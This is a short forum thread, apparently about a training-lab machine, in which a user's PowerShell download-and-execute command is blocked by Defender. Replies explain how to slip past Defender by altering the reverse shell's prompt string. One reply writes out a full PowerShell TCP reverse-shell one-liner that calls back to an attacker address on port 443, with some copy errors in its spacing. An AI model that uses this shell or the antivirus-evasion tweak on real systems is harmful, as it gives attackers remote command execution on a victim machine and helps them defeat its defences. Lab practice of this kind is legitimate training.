Starting Point

This script contains malicious content and has been blocked by your antivirus software.

At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("http:// ip /she …
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

I get this error when loading the shell on the SQL server. Has anyone else run into this and solved it already?

Hello,
I had the issue because I was using a PowerShell from GitHub (copy/paste failed into my VM…), and the solution was in the comments:
if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"
source: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub

However, the script provided in the tutorial does contain the #, so you may check that part in your reverse shell.

Regards

The official tutorial contains a typo. There is "# " and it has to be "#" without a space.

$client=New-ObjectSystem.Net.Sockets.TCPClient(“<Your_IP>”,443);$stream=$client.GetStream();[byte]$bytes=0…65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne0){;$data=(New-Object-TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-String);$sendback2=$sendback+“#”;$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()